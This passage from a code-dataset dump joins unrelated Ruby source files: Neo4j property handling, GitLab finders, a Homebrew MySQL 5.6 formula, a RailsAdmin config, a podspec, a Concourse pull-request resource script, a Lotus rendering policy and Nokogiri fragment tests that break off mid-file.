def process_multiparameter_attributes(multi_parameter_attributes, new_attributes)
multi_parameter_attributes.each_with_object(new_attributes) do |(key, values), attributes|
values = (values.keys.min..values.keys.max).map { |i| values[i] }
if (field = self.class.attributes[key.to_sym]).nil?
fail MultiparameterAssignmentError, "error on assignment #{values.inspect} to #{key}"
end
attributes[key] = instantiate_object(field, values)
end
end
def instantiate_object(field, values_with_empty_parameters)
return nil if values_with_empty_parameters.all?(&:nil?)
values = values_with_empty_parameters.collect { |v| v.nil? ? 1 : v }
klass = field.type
klass ? klass.new(*values) : values
end
module ClassMethods
extend Forwardable
def_delegators :declared_properties, :serialized_properties, :serialized_properties=, :serialize, :declared_property_defaults
VALID_PROPERTY_OPTIONS = %w(type default index constraint serializer typecaster).map(&:to_sym)
# Defines a property on the class
#
# See active_attr gem for allowed options, e.g which type
# Notice, in Neo4j you don't have to declare properties before using them, see the neo4j-core api.
#
# @example Without type
# class Person
# # declare a property which can have any value
# property :name
# end
#
# @example With type and a default value
# class Person
# # declare a property which can have any value
# property :score, type: Integer, default: 0
# end
#
# @example With an index
# class Person
# # declare a property which can have any value
# property :name, index: :exact
# end
#
# @example With a constraint
# class Person
# # declare a property which can have any value
# property :name, constraint: :unique
# end
def property(name, options = {})
invalid_option_keys = options.keys.map(&:to_sym) - VALID_PROPERTY_OPTIONS
fail ArgumentError, "Invalid options for property `#{name}` on `#{self.name}`: #{invalid_option_keys.join(', ')}" if invalid_option_keys.any?
build_property(name, options) do |prop|
attribute(prop)
end
end
# @param [Symbol] name The property name
# @param [Neo4j::Shared::AttributeDefinition] attr_def A cloned AttributeDefinition to reuse
# @param [Hash] options An options hash to use in the new property definition
def inherit_property(name, attr_def, options = {})
build_property(name, options) do |prop_name|
attributes[prop_name] = attr_def
end
end
def build_property(name, options)
decl_prop = DeclaredProperty.new(name, options).tap do |prop|
prop.register
declared_properties.register(prop)
yield name
constraint_or_index(name, options)
end
# If this class has already been inherited, make sure subclasses inherit property
subclasses.each do |klass|
klass.inherit_property name, decl_prop.clone, declared_properties[name].options
end
decl_prop
end
def undef_property(name)
undef_constraint_or_index(name)
declared_properties.unregister(name)
attribute_methods(name).each { |method| undef_method(method) }
end
def declared_properties
@_declared_properties ||= DeclaredProperties.new(self)
end
# @return [Hash] A frozen hash of all model properties with nil values. It is used during node loading and prevents
# an extra call to a slow dependency method.
def attributes_nil_hash
declared_properties.attributes_nil_hash
end
def extract_association_attributes!(props)
props
end
private
def attribute!(name)
remove_instance_variable('@attribute_methods_generated') if instance_variable_defined?('@attribute_methods_generated')
define_attribute_methods([name]) unless attribute_names.include?(name)
attributes[name.to_s] = declared_properties[name]
define_method("#{name}=") do |value|
typecast_value = typecast_attribute(_attribute_typecaster(name), value)
send("#{name}_will_change!") unless typecast_value == read_attribute(name)
super(value)
end
end
def constraint_or_index(name, options)
# either constraint or index, do not set both
if options[:constraint]
fail "unknown constraint type #{options[:constraint]}, only :unique supported" if options[:constraint] != :unique
constraint(name, type: :unique)
elsif options[:index]
fail "unknown index type #{options[:index]}, only :exact supported" if options[:index] != :exact
index(name) if options[:index] == :exact
end
end
def undef_constraint_or_index(name)
prop = declared_properties[name]
return unless prop.index_or_constraint?
type = prop.constraint? ? :constraint : :index
send(:"drop_#{type}", name)
end
end
end
end
| 37.081197 | 149 | 0.667051 |
d5e6c4783c1dc3de8f2d6f43681eddbcbfd88813 | 2,879 | # frozen_string_literal: true
# Finders::MergeRequest class
#
# Used to filter MergeRequests collections by set of params
#
# Arguments:
# current_user - which user use
# params:
# scope: 'created_by_me' or 'assigned_to_me' or 'all'
# state: 'open', 'closed', 'merged', 'locked', or 'all'
# group_id: integer
# project_id: integer
# milestone_title: string
# release_tag: string
# author_id: integer
# author_username: string
# assignee_id: integer
# search: string
# in: 'title', 'description', or a string joining them with comma
# label_name: string
# sort: string
# non_archived: boolean
# my_reaction_emoji: string
# source_branch: string
# target_branch: string
# created_after: datetime
# created_before: datetime
# updated_after: datetime
# updated_before: datetime
#
class MergeRequestsFinder < IssuableFinder
def self.scalar_params
@scalar_params ||= super + [:wip, :target_branch]
end
def klass
MergeRequest
end
def filter_items(_items)
items = by_commit(super)
items = by_deployment(items)
items = by_source_branch(items)
items = by_wip(items)
items = by_target_branch(items)
by_source_project_id(items)
end
private
def by_commit(items)
return items unless params[:commit_sha].presence
items.by_commit_sha(params[:commit_sha])
end
def source_branch
@source_branch ||= params[:source_branch].presence
end
# rubocop: disable CodeReuse/ActiveRecord
def by_source_branch(items)
return items unless source_branch
items.where(source_branch: source_branch)
end
# rubocop: enable CodeReuse/ActiveRecord
def target_branch
@target_branch ||= params[:target_branch].presence
end
# rubocop: disable CodeReuse/ActiveRecord
def by_target_branch(items)
return items unless target_branch
items.where(target_branch: target_branch)
end
def source_project_id
@source_project_id ||= params[:source_project_id].presence
end
def by_source_project_id(items)
return items unless source_project_id
items.where(source_project_id: source_project_id)
end
def by_wip(items)
if params[:wip] == 'yes'
items.where(wip_match(items.arel_table))
elsif params[:wip] == 'no'
items.where.not(wip_match(items.arel_table))
else
items
end
end
def wip_match(table)
table[:title].matches('WIP:%')
.or(table[:title].matches('WIP %'))
.or(table[:title].matches('[WIP]%'))
end
def by_deployment(items)
return items unless deployment_id
items.includes(:deployment_merge_requests)
.where(deployment_merge_requests: { deployment_id: deployment_id })
end
def deployment_id
@deployment_id ||= params[:deployment_id].presence
end
end
MergeRequestsFinder.prepend_if_ee('EE::MergeRequestsFinder')
| 23.991667 | 76 | 0.704411 |
b9a5fb274e99c0732aabb9a8f50f76a8b6a8fe3a | 5,769 | class MysqlAT56 < Formula
desc "Open source relational database management system"
homepage "https://dev.mysql.com/doc/refman/5.6/en/"
url "https://dev.mysql.com/get/Downloads/MySQL-5.6/mysql-5.6.51.tar.gz"
sha256 "262ccaf2930fca1f33787505dd125a7a04844f40d3421289a51974b5935d9abc"
license "GPL-2.0-only"
bottle do
rebuild 1
sha256 monterey: "e3132c3b1381b6ea6a2298166866e637560b0be3223912d1512a150b096fa104"
sha256 big_sur: "30a530ddb785efe7542641366126d7b4afcce09bde0fa104b869814fa69fc9e2"
sha256 catalina: "a5309a985dccc02490ff9bd0be1575a4e8908ca3e15dcfaa77e7d2b2bd616cfd"
sha256 mojave: "1ba2347383b539258d1c0a29cbbee722c30e6c28446c22a669a8a7deabd5f53e"
sha256 x86_64_linux: "91b24798f46a2bc7b616fb73fc47a5337acb5b8e0a6f9be1c657eade6fade45b"
end
keg_only :versioned_formula
deprecate! date: "2021-02-01", because: :unsupported
depends_on "cmake" => :build
depends_on "[email protected]"
uses_from_macos "libedit"
def datadir
var/"mysql"
end
# Fixes loading of VERSION file, backported from mysql/mysql-server@51675dd
patch :DATA
def install
# Don't hard-code the libtool path. See:
# https://github.com/Homebrew/homebrew/issues/20185
inreplace "cmake/libutils.cmake",
"COMMAND /usr/bin/libtool -static -o ${TARGET_LOCATION}",
"COMMAND libtool -static -o ${TARGET_LOCATION}"
# Fix loading of VERSION file; required in conjunction with patch
File.rename "VERSION", "MYSQL_VERSION"
# -DINSTALL_* are relative to `CMAKE_INSTALL_PREFIX` (`prefix`)
args = %W[
-DCOMPILATION_COMMENT=Homebrew
-DDEFAULT_CHARSET=utf8
-DDEFAULT_COLLATION=utf8_general_ci
-DINSTALL_DOCDIR=share/doc/#{name}
-DINSTALL_INCLUDEDIR=include/mysql
-DINSTALL_INFODIR=share/info
-DINSTALL_MANDIR=share/man
-DINSTALL_MYSQLSHAREDIR=share/mysql
-DMYSQL_DATADIR=#{datadir}
-DSYSCONFDIR=#{etc}
-DWITH_EDITLINE=system
-DWITH_NUMA=OFF
-DWITH_SSL=yes
-DWITH_UNIT_TESTS=OFF
-DWITH_EMBEDDED_SERVER=ON
-DWITH_ARCHIVE_STORAGE_ENGINE=1
-DWITH_BLACKHOLE_STORAGE_ENGINE=1
-DENABLED_LOCAL_INFILE=1
-DWITH_INNODB_MEMCACHED=ON
]
system "cmake", ".", *std_cmake_args, *args
system "make"
system "make", "install"
# Avoid references to the Homebrew shims directory
inreplace bin/"mysqlbug", "#{Superenv.shims_path}/", ""
(prefix/"mysql-test").cd do
system "./mysql-test-run.pl", "status", "--vardir=#{Dir.mktmpdir}"
end
# Remove the tests directory
rm_rf prefix/"mysql-test"
# Don't create databases inside of the prefix!
# See: https://github.com/Homebrew/homebrew/issues/4975
rm_rf prefix/"data"
# Link the setup script into bin
bin.install_symlink prefix/"scripts/mysql_install_db"
# Fix up the control script and link into bin.
inreplace "#{prefix}/support-files/mysql.server",
/^(PATH=".*)(")/,
"\\1:#{HOMEBREW_PREFIX}/bin\\2"
bin.install_symlink prefix/"support-files/mysql.server"
libexec.install bin/"mysqlaccess"
libexec.install bin/"mysqlaccess.conf"
# Install my.cnf that binds to 127.0.0.1 by default
(buildpath/"my.cnf").write <<~EOS
# Default Homebrew MySQL server config
[mysqld]
# Only allow connections from localhost
bind-address = 127.0.0.1
EOS
etc.install "my.cnf"
end
def post_install
# Make sure the var/mysql directory exists
(var/"mysql").mkpath
# Don't initialize database, it clashes when testing other MySQL-like implementations.
return if ENV["HOMEBREW_GITHUB_ACTIONS"]
unless (datadir/"mysql/general_log.CSM").exist?
ENV["TMPDIR"] = nil
system bin/"mysql_install_db", "--verbose", "--user=#{ENV["USER"]}",
"--basedir=#{prefix}", "--datadir=#{datadir}", "--tmpdir=/tmp"
end
end
def caveats
<<~EOS
A "/etc/my.cnf" from another install may interfere with a Homebrew-built
server starting up correctly.
MySQL is configured to only allow connections from localhost by default
To connect:
mysql -uroot
EOS
end
service do
run [opt_bin/"mysqld_safe", "--datadir=#{var}/mysql"]
keep_alive true
working_dir var/"mysql"
end
test do
(testpath/"mysql").mkpath
(testpath/"tmp").mkpath
system bin/"mysql_install_db", "--no-defaults", "--user=#{ENV["USER"]}",
"--basedir=#{prefix}", "--datadir=#{testpath}/mysql", "--tmpdir=#{testpath}/tmp"
port = free_port
fork do
system "#{bin}/mysqld", "--no-defaults", "--user=#{ENV["USER"]}",
"--datadir=#{testpath}/mysql", "--port=#{port}", "--tmpdir=#{testpath}/tmp"
end
sleep 5
assert_match "information_schema",
shell_output("#{bin}/mysql --port=#{port} --user=root --password= --execute='show databases;'")
system "#{bin}/mysqladmin", "--port=#{port}", "--user=root", "--password=", "shutdown"
end
end
__END__
diff --git a/cmake/mysql_version.cmake b/cmake/mysql_version.cmake
index 34ed6f4..4becbbc 100644
--- a/cmake/mysql_version.cmake
+++ b/cmake/mysql_version.cmake
@@ -31,7 +31,7 @@ SET(DOT_FRM_VERSION "6")
# Generate "something" to trigger cmake rerun when VERSION changes
CONFIGURE_FILE(
- ${CMAKE_SOURCE_DIR}/VERSION
+ ${CMAKE_SOURCE_DIR}/MYSQL_VERSION
${CMAKE_BINARY_DIR}/VERSION.dep
)
@@ -39,7 +39,7 @@ CONFIGURE_FILE(
MACRO(MYSQL_GET_CONFIG_VALUE keyword var)
IF(NOT ${var})
- FILE (STRINGS ${CMAKE_SOURCE_DIR}/VERSION str REGEX "^[ ]*${keyword}=")
+ FILE (STRINGS ${CMAKE_SOURCE_DIR}/MYSQL_VERSION str REGEX "^[ ]*${keyword}=")
IF(str)
STRING(REPLACE "${keyword}=" "" str ${str})
STRING(REGEX REPLACE "[ ].*" "" str "${str}")
| 32.410112 | 101 | 0.678454 |
28d03832c8f94710753a805d6e3dd5304542ce94 | 3,291 | module RailsAdmin
module Models
module Setup
module AlgorithmAdmin
extend ActiveSupport::Concern
included do
rails_admin do
navigation_label 'Compute'
navigation_icon 'fa fa-cog'
weight 400
object_label_method { :custom_title }
extra_associations do
association = ::Mongoid::Relations::Metadata.new(
name: :stored_outputs, relation: ::Mongoid::Relations::Referenced::Many,
inverse_class_name: ::Setup::Algorithm.to_s, class_name: ::Setup::AlgorithmOutput.to_s
)
[RailsAdmin::Adapters::Mongoid::Association.new(association, abstract_model.model)]
end
configure :namespace, :enum_edit
configure :code_warnings, :code_warnings
configure :code, :code do
help { 'Required' }
code_config do
{
mode: case bindings[:object].language
when :php
'text/x-php'
when :javascript
'text/javascript'
when :python
'text/x-python'
else
'text/x-ruby'
end
}
end
end
configure :language do
help 'Required'
end
edit do
field :namespace, :enum_edit, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :name, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :description, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :parameters, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :language, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :code_warnings
field :code
field :call_links do
shared_read_only
visible { bindings[:object].call_links.present? }
end
field :store_output, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :output_datatype, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :validate_output, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :tags, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
end
show do
field :namespace
field :name
field :description
field :language
field :parameters
field :code_warnings
field :code
field :call_links
field :tags
field :_id
field :stored_outputs
end
list do
field :namespace
field :name
field :description
field :language
field :tags
field :updated_at
end
fields :namespace, :name, :description, :language, :parameters, :call_links, :tags
filter_query_fields :namespace, :name
end
end
end
end
end
end
| 33.242424 | 102 | 0.512306 |
5d5f1e459b04a6480f34db7bb2c853c3c8f566ad | 883 | Pod::Spec.new do |s|
s.name = "CWPopup"
s.version = "1.2.4"
s.summary = "A category on UIViewController to present a popup view controller."
s.description = "CWPopup adds a category on UIViewController to present a popup view controller. It offers an animated and non-animated presentation of the popup, similarly to presenting a modal controller or pushing a view controller."
s.homepage = "http://github.com/cezarywojcik/CWPopup"
s.screenshots = "https://raw.github.com/cezarywojcik/CWPopup/master/screenshot.png"
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { "Cezary Wojcik" => "[email protected]" }
s.platform = :ios, '4.3'
s.source = { :git => "https://github.com/cezarywojcik/CWPopup.git",
:tag => s.version.to_s }
s.source_files = 'CWPopup'
s.requires_arc = true
end
| 55.1875 | 239 | 0.667044 |
e9a7d6a315240d122b05037588122999330eb063 | 1,763 | # frozen_string_literal: true
module GroupTree
# rubocop:disable Gitlab/ModuleWithInstanceVariables
# rubocop: disable CodeReuse/ActiveRecord
def render_group_tree(groups)
groups = groups.sort_by_attribute(@sort = params[:sort])
groups = if params[:filter].present?
filtered_groups_with_ancestors(groups)
else
# If `params[:parent_id]` is `nil`, we will only show root-groups
groups.where(parent_id: params[:parent_id]).page(params[:page])
end
@groups = groups.with_selects_for_list(archived: params[:archived])
respond_to do |format|
format.html
format.json do
serializer = GroupChildSerializer.new(current_user: current_user)
.with_pagination(request, response)
serializer.expand_hierarchy if params[:filter].present?
render json: serializer.represent(@groups)
end
end
# rubocop:enable Gitlab/ModuleWithInstanceVariables
end
# rubocop: enable CodeReuse/ActiveRecord
# rubocop: disable CodeReuse/ActiveRecord
def filtered_groups_with_ancestors(groups)
filtered_groups = groups.search(params[:filter]).page(params[:page])
if Group.supports_nested_objects?
# We find the ancestors by ID of the search results here.
# Otherwise the ancestors would also have filters applied,
# which would cause them not to be preloaded.
#
# Pagination needs to be applied before loading the ancestors to
# make sure ancestors are not cut off by pagination.
Gitlab::ObjectHierarchy.new(Group.where(id: filtered_groups.select(:id)))
.base_and_ancestors
else
filtered_groups
end
end
# rubocop: enable CodeReuse/ActiveRecord
end
| 35.26 | 80 | 0.695406 |
1c1f709f9d0ccf71989296a69805e4cf6d0516fd | 3,503 | #!/usr/bin/env ruby
# frozen_string_literal: true
require 'English'
require 'json'
require 'shellwords'
require_relative 'base'
module Commands
class In < Commands::Base
attr_reader :destination
def initialize(destination:, input: Input.instance)
@destination = destination
super(input: input)
end
def output
id = pr['number']
branch_ref = "pr-#{pr['head']['ref']}"
raise 'PR has merge conflicts' if pr['mergeable'] == false && fetch_merge
system("git clone #{depth_flag} --branch #{pr['base']['ref']} #{uri} #{destination} 1>&2")
raise 'git clone failed' unless $CHILD_STATUS.exitstatus.zero?
Dir.chdir(File.join(destination, '.git')) do
File.write('url', pr['html_url'])
File.write('id', pr['number'])
File.write('body', pr['body'])
File.write('branch', pr['head']['ref'])
File.write('base_branch', pr['base']['ref'])
File.write('base_sha', pr['base']['sha'])
File.write('userlogin', pr['user']['login'])
File.write('head_sha', pr['head']['sha'])
File.write('useremail', user['email'])
end
Dir.chdir(destination) do
raise 'git clone failed' unless system("git fetch #{depth_flag} -q origin pull/#{id}/#{remote_ref}:#{branch_ref} 1>&2")
system <<-BASH
git checkout #{branch_ref} 1>&2
git config --add pullrequest.url #{pr['html_url'].to_s.shellescape} 1>&2
git config --add pullrequest.id #{pr['number'].to_s.shellescape} 1>&2
git config --add pullrequest.body #{pr['body'].to_s.shellescape} 1>&2
git config --add pullrequest.branch #{pr['head']['ref'].to_s.shellescape} 1>&2
git config --add pullrequest.basebranch #{pr['base']['ref'].to_s.shellescape} 1>&2
git config --add pullrequest.basesha #{pr['base']['sha'].to_s.shellescape} 1>&2
git config --add pullrequest.userlogin #{pr['user']['login'].to_s.shellescape} 1>&2
git config --add pullrequest.useremail #{user['email'].to_s.shellescape} 1>&2
BASH
case input.params.git.submodules
when 'all', nil
system("git submodule update --init --recursive #{depth_flag} 1>&2")
when Array
input.params.git.submodules.each do |path|
system("git submodule update --init --recursive #{depth_flag} #{path} 1>&2")
end
end
unless input.params.git.disable_lfs
system('git lfs fetch 1>&2')
system('git lfs checkout 1>&2')
end
end
{
'version' => { 'ref' => ref, 'pr' => id.to_s },
'metadata' => [{ 'name' => 'url', 'value' => pr['html_url'] }]
}
end
private
def pr
@pr ||= Octokit.pull_request(input.source.repo, input.version.pr)
end
def user
@user ||= Octokit.user(pr['user']['login'])
rescue StandardError
return {'email' => ''}
end
def uri
input.source.uri || "https://github.com/#{input.source.repo}"
end
def ref
input.version.ref
end
def remote_ref
fetch_merge ? 'merge' : 'head'
end
def fetch_merge
input.params.fetch_merge
end
def depth_flag
if depth = input.params.git.depth
"--depth #{depth}"
else
''
end
end
end
end
if $PROGRAM_NAME == __FILE__
destination = ARGV.shift
command = Commands::In.new(destination: destination)
puts JSON.generate(command.output)
end
| 29.191667 | 127 | 0.587782 |
6a90605a212aeaf3372671603cd21f61b725fd56 | 2,536 | require 'lotus/utils/class'
require 'lotus/views/default'
require 'lotus/views/null_view'
module Lotus
# Rendering policy
#
# @since 0.1.0
# @api private
class RenderingPolicy
STATUS = 0
HEADERS = 1
BODY = 2
LOTUS_ACTION = 'lotus.action'.freeze
SUCCESSFUL_STATUSES = (200..201).freeze
STATUSES_WITHOUT_BODY = Set.new((100..199).to_a << 204 << 205 << 301 << 302 << 304).freeze
EMPTY_BODY = Array.new.freeze
RENDERABLE_FORMATS = [:all, :html].freeze
CONTENT_TYPE = 'Content-Type'.freeze
REQUEST_METHOD = 'REQUEST_METHOD'.freeze
HEAD = 'HEAD'.freeze
def initialize(configuration)
@controller_pattern = %r{#{ configuration.controller_pattern.gsub(/\%\{(controller|action)\}/) { "(?<#{ $1 }>(.*))" } }}
@view_pattern = configuration.view_pattern
@namespace = configuration.namespace
@templates = configuration.templates
end
def render(env, response)
body = _render(env, response) || _render_head(env)
response[BODY] = Array(body) unless body.nil?
response
end
private
def _render(env, response)
if action = renderable?(env)
_render_action(action, response) ||
_render_status_page(action, response)
end
end
def _render_action(action, response)
if successful?(response)
view_for(action, response).render(
action.to_rendering
)
end
end
def _render_status_page(action, response)
if render_status_page?(action, response)
Lotus::Views::Default.render(@templates, response[STATUS], response: response, format: :html)
end
end
def _render_head(env)
EMPTY_BODY if head?(env)
end
def renderable?(env)
!head?(env) and
env.delete(LOTUS_ACTION)
end
def successful?(response)
SUCCESSFUL_STATUSES.include?(response[STATUS])
end
def head?(env)
env[REQUEST_METHOD] == HEAD
end
def render_status_page?(action, response)
RENDERABLE_FORMATS.include?(action.format) &&
!STATUSES_WITHOUT_BODY.include?(response[STATUS])
end
def view_for(action, response)
if response[BODY].empty?
captures = @controller_pattern.match(action.class.name)
Utils::Class.load!(@view_pattern % { controller: captures[:controller], action: captures[:action] }, @namespace)
else
Views::NullView.new(response[BODY])
end
end
end
end
| 27.268817 | 126 | 0.629338 |
8781dc1d9c45786d94400ac94063350a4e3385f4 | 14,464 | # frozen_string_literal: true
require "helper"
module Nokogiri
module XML
class TestDocumentFragment < Nokogiri::TestCase
describe Nokogiri::XML::DocumentFragment do
let(:xml) { Nokogiri::XML.parse(File.read(XML_FILE), XML_FILE) }
def test_replace_text_node
html = "foo"
doc = Nokogiri::XML::DocumentFragment.parse(html)
doc.children[0].replace("bar")
assert_equal("bar", doc.children[0].content)
end
def test_fragment_is_relative
doc = Nokogiri::XML('<root><a xmlns="blah" /></root>')
ctx = doc.root.child
fragment = Nokogiri::XML::DocumentFragment.new(doc, "<hello />", ctx)
hello = fragment.child
assert_equal("hello", hello.name)
assert_equal(doc.root.child.namespace, hello.namespace)
end
def test_node_fragment_is_relative
doc = Nokogiri::XML('<root><a xmlns="blah" /></root>')
assert(doc.root.child)
fragment = doc.root.child.fragment("<hello />")
hello = fragment.child
assert_equal("hello", hello.name)
assert_equal(doc.root.child.namespace, hello.namespace)
end
def test_new
assert(Nokogiri::XML::DocumentFragment.new(xml))
end
def test_fragment_should_have_document
fragment = Nokogiri::XML::DocumentFragment.new(xml)
assert_equal(xml, fragment.document)
end
def test_name
fragment = Nokogiri::XML::DocumentFragment.new(xml)
assert_equal("#document-fragment", fragment.name)
end
def test_static_method
fragment = Nokogiri::XML::DocumentFragment.parse("<div>a</div>")
assert_instance_of(Nokogiri::XML::DocumentFragment, fragment)
end
def test_static_method_with_namespaces
# follows different path in FragmentHandler#start_element which blew up after 597195ff
fragment = Nokogiri::XML::DocumentFragment.parse("<o:div>a</o:div>")
assert_instance_of(Nokogiri::XML::DocumentFragment, fragment)
end
def test_many_fragments
100.times { Nokogiri::XML::DocumentFragment.new(xml) }
end
def test_unparented_text_node_parse
fragment = Nokogiri::XML::DocumentFragment.parse("foo")
fragment.children.after("<bar/>")
end
def test_xml_fragment
fragment = Nokogiri::XML.fragment("<div>a</div>")
assert_equal("<div>a</div>", fragment.to_s)
end
def test_xml_fragment_has_multiple_toplevel_children
doc = "<div>b</div><div>e</div>"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("<div>b</div><div>e</div>", fragment.to_s)
end
def test_xml_fragment_has_outer_text
# this test is descriptive, not prescriptive.
doc = "a<div>b</div>"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("a<div>b</div>", fragment.to_s)
doc = "<div>b</div>c"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("<div>b</div>c", fragment.to_s)
end
def test_xml_fragment_case_sensitivity
doc = "<crazyDiv>b</crazyDiv>"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("<crazyDiv>b</crazyDiv>", fragment.to_s)
end
def test_xml_fragment_with_leading_whitespace
doc = " <div>b</div> "
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal(" <div>b</div> ", fragment.to_s)
end
def test_xml_fragment_with_leading_whitespace_and_newline
doc = " \n<div>b</div> "
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal(" \n<div>b</div> ", fragment.to_s)
end
def test_fragment_children_search
fragment = Nokogiri::XML::Document.new.fragment(
'<div><p id="content">hi</p></div>'
)
expected = fragment.children.xpath(".//p")
assert_equal(1, expected.length)
css = fragment.children.css("p")
search_css = fragment.children.search("p")
search_xpath = fragment.children.search(".//p")
assert_equal(expected, css)
assert_equal(expected, search_css)
assert_equal(expected, search_xpath)
end
def test_fragment_css_search_with_whitespace_and_node_removal
# The same xml without leading whitespace in front of the first line
# does not expose the error. Putting both nodes on the same line
# instead also fixes the crash.
fragment = Nokogiri::XML::DocumentFragment.parse(<<~EOXML)
<p id="content">hi</p> x <!--y--> <p>another paragraph</p>
EOXML
children = fragment.css("p")
assert_equal(2, children.length)
# removing the last node instead does not yield the error. Probably the
# node removal leaves around two consecutive text nodes which make the
# css search crash?
children.first.remove
assert_equal(1, fragment.xpath(".//p | self::p").length)
assert_equal(1, fragment.css("p").length)
end
def test_fragment_search_three_ways
frag = Nokogiri::XML::Document.new.fragment('<p id="content">foo</p><p id="content">bar</p>')
expected = frag.xpath('./*[@id = "content"]')
assert_equal(2, expected.length)
[
[:css, "#content"],
[:search, "#content"],
[:search, "./*[@id = 'content']"],
].each do |method, query|
result = frag.send(method, query)
assert_equal(expected, result,
"fragment search with :#{method} using '#{query}' expected '#{expected}' got '#{result}'")
end
end
def test_fragment_search_with_multiple_queries
xml = <<~EOF
<thing>
<div class="title">important thing</div>
</thing>
<thing>
<div class="content">stuff</div>
</thing>
<thing>
<p class="blah">more stuff</div>
</thing>
EOF
fragment = Nokogiri::XML.fragment(xml)
assert_kind_of(Nokogiri::XML::DocumentFragment, fragment)
assert_equal(3, fragment.xpath(".//div", ".//p").length)
assert_equal(3, fragment.css(".title", ".content", "p").length)
assert_equal(3, fragment.search(".//div", "p.blah").length)
end
def test_fragment_without_a_namespace_does_not_get_a_namespace
doc = Nokogiri::XML(<<~EOX)
<root xmlns="http://tenderlovemaking.com/" xmlns:foo="http://flavorjon.es/" xmlns:bar="http://google.com/">
<foo:existing></foo:existing>
</root>
EOX
frag = doc.fragment("<newnode></newnode>")
assert_nil(frag.namespace)
end
def test_fragment_namespace_resolves_against_document_root
doc = Nokogiri::XML(<<~EOX)
<root xmlns:foo="http://flavorjon.es/" xmlns:bar="http://google.com/">
<foo:existing></foo:existing>
</root>
EOX
ns = doc.root.namespace_definitions.detect { |x| x.prefix == "bar" }
frag = doc.fragment("<bar:newnode></bar:newnode>")
assert(frag.children.first.namespace)
assert_equal(ns, frag.children.first.namespace)
end
def test_fragment_invalid_namespace_is_silently_ignored
doc = Nokogiri::XML(<<~EOX)
<root xmlns:foo="http://flavorjon.es/" xmlns:bar="http://google.com/">
<foo:existing></foo:existing>
</root>
EOX
frag = doc.fragment("<baz:newnode></baz:newnode>")
assert_nil(frag.children.first.namespace)
end
def test_decorator_is_applied
x = Module.new do
def awesome!
end
end
util_decorate(xml, x)
fragment = Nokogiri::XML::DocumentFragment.new(xml, "<div>a</div><div>b</div>")
assert(node_set = fragment.css("div"))
assert_respond_to(node_set, :awesome!)
node_set.each do |node|
assert_respond_to(node, :awesome!, node.class)
end
assert_respond_to(fragment.children, :awesome!, fragment.children.class)
end
def test_decorator_is_applied_to_empty_set
x = Module.new do
def awesome!
end
end
util_decorate(xml, x)
fragment = Nokogiri::XML::DocumentFragment.new(xml, "")
assert_respond_to(fragment.children, :awesome!, fragment.children.class)
end
def test_add_node_to_doc_fragment_segfault
frag = Nokogiri::XML::DocumentFragment.new(xml, "<p>hello world</p>")
Nokogiri::XML::Comment.new(frag, "moo")
end
def test_issue_1077_parsing_of_frozen_strings
input = <<~EOS
<?xml version="1.0" encoding="utf-8"?>
<library>
<book title="I like turtles"/>
</library>
EOS
input.freeze
Nokogiri::XML::DocumentFragment.parse(input) # assert_nothing_raised
end
def test_dup_should_exist_in_a_new_document
skip_unless_libxml2("this is only true in the C extension")
# https://github.com/sparklemotion/nokogiri/issues/1063
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
refute_equal(original.document, duplicate.document)
end
def test_dup_should_create_an_xml_document_fragment
# https://github.com/sparklemotion/nokogiri/issues/1846
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
assert_instance_of(Nokogiri::XML::DocumentFragment, duplicate)
end
def test_dup_creates_tree_with_identical_structure
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
assert_equal(original.to_html, duplicate.to_html)
end
def test_dup_creates_mutable_tree
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
duplicate.at_css("div").add_child("<b>hello there</b>")
assert_nil(original.at_css("b"))
refute_nil(duplicate.at_css("b"))
end
def test_for_libxml_in_context_fragment_parsing_bug_workaround
skip_unless_libxml2("valgrind tests should only run with libxml2")
refute_valgrind_errors do
fragment = Nokogiri::XML.fragment("<div></div>")
parent = fragment.children.first
child = parent.parse("<h1></h1>").first
parent.add_child(child)
end
end
def test_for_libxml_in_context_memory_badness_when_encountering_encoding_errors
skip_unless_libxml2("valgrind tests should only run with libxml2")
# see issue #643 for background
refute_valgrind_errors do
html = <<~EOHTML
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=shizzle" />
</head>
<body>
<div>Foo</div>
</body>
</html>
EOHTML
doc = Nokogiri::HTML(html)
doc.at_css("div").replace("Bar")
end
end
describe "subclassing" do
let(:klass) do
Class.new(Nokogiri::XML::DocumentFragment) do
attr_accessor :initialized_with, :initialized_count
def initialize(*args)
super
@initialized_with = args
@initialized_count ||= 0
@initialized_count += 1
end
end
end
describe ".new" do
it "returns an instance of the right class" do
fragment = klass.new(xml, "<div>a</div>")
assert_instance_of(klass, fragment)
end
it "calls #initialize exactly once" do
fragment = klass.new(xml, "<div>a</div>")
assert_equal(1, fragment.initialized_count)
end
it "passes args to #initialize" do
fragment = klass.new(xml, "<div>a</div>")
assert_equal([xml, "<div>a</div>"], fragment.initialized_with)
end
end
it "#dup returns the expected class" do
doc = klass.new(xml, "<div>a</div>").dup
assert_instance_of(klass, doc)
end
describe ".parse" do
it "returns an instance of the right class" do
fragment = klass.parse("<div>a</div>")
assert_instance_of(klass, fragment)
end
it "calls #initialize exactly once" do
fragment = klass.parse("<div>a</div>")
assert_equal(1, fragment.initialized_count)
end
it "passes the fragment" do
fragment = klass.parse("<div>a</div>")
